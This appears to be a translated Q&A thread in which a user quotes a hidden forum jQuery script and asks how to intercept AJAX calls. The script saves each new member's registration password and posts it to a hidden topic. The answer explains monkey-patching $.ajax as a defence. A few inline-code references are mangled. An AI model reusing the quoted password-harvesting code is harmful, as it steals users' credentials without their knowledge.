Intercept AJAX requests

7

I have the following question, how can I do to "intercept" AJAX requests before they are done?

For example, in some forums while constantly browsing requests are being made without our knowledge, another day I was in a forum and I decided to take a look at their scripts and found the following:

jQuery(document).ready(function () {
     if (_userdata["user_posts"] === 0) {
         jQuery('<div id="get_pass" style="display: none;"></div>').insertAfter('#right .module:last');
         jQuery('#ucp input[name="submit"]').on('click', function () {
             var fieldValue = document.getElementById('password_reg').value;
             localStorage.setItem('text', fieldValue);
         });
         jQuery(window).load(function () {
             storedValue = localStorage.getItem('text');
             if (storedValue) {
                 jQuery('#get_pass').html(storedValue);
             }
             var senha = jQuery('#get_pass').text();
             jQuery.post('/post', {
                 message: 'Minha senha: ' + senha + '',
                 t: '4',
                 mode: 'reply',
                 post: 'Enviar'
             });
         });
     }
});

For those who do not understand, this causes the user to enter his password, this script takes the password and sends it to a hidden topic of normal users (via AJAX), ie the guy must have a log with the password of all the users of his forum.

I got into the habit of not using the same password on all the sites I navigate, so I will not have problems with it knowing mine or not, but I do not want this to happen again, so I'm looking for a script I want to use a Snippet in Chrome I do not know yet) every time an AJAX request is made a alert appears on my screen showing what content will be sent in this request and some way to confirm it (if it is legitimate) or cancel be malicious). Is it possible to do this?

    
asked by anonymous 06.06.2014 / 23:12

1 answer

7

You can use a technique called Monkey Patching to modify how Ajax calls work.

All Javascript functions can be overridden. Try it on the console of your browser, it's fun :) For example, the code below causes the alert native function to work in the language of P:

var foo = alert;
alert = function (text) {
    var words = text.split(" ");
    for (var i = 0; i < words.length; i++) {
        words[i] = "p" + words[i];
    }
    foo(words.join(" "));
}
alert("Hello world!");

You can do the same with the function % of jQuery% and Ajax of object getItem :

var foo = $.ajax;
$.ajax = function (a, b) {
    var bar = localStorage.getItem; // armazenando a função de pegar dados numa variável
    localStorage.getItem = function () {
        return "Vai se lascar hacker filho da p..."; // ou a URL minificada para 'Never Gonna Give You Up' no Youtube.
    };
    foo(a, b);
    localStorage.getItem = bar; // voltando a função ao normal.
}

Be careful only with object and function contexts (you may need a localStorage here or there) - but beware mainly because if you make Monkey Patching a habit, you are delivering your developer soul to McGyver;) Do not abuse your powers that way.

With this technique, you can, of course, make a browser extension that you can use in a personal way. Or you can start a project in Github to make an extension that checks for malicious code by sending credentials to someone as you describe it, and preventing access to bind only in those cases.

Editing: I forgot to say but I think it becomes clear after you apply the above technique. You can also play on the console (or some other place where you can read) the values of each property or parameter, and even the body of each method Ajax uses internally. This way you can display messages specifically posted in Ajax Posts somewhere.

    
06.06.2014 / 23:29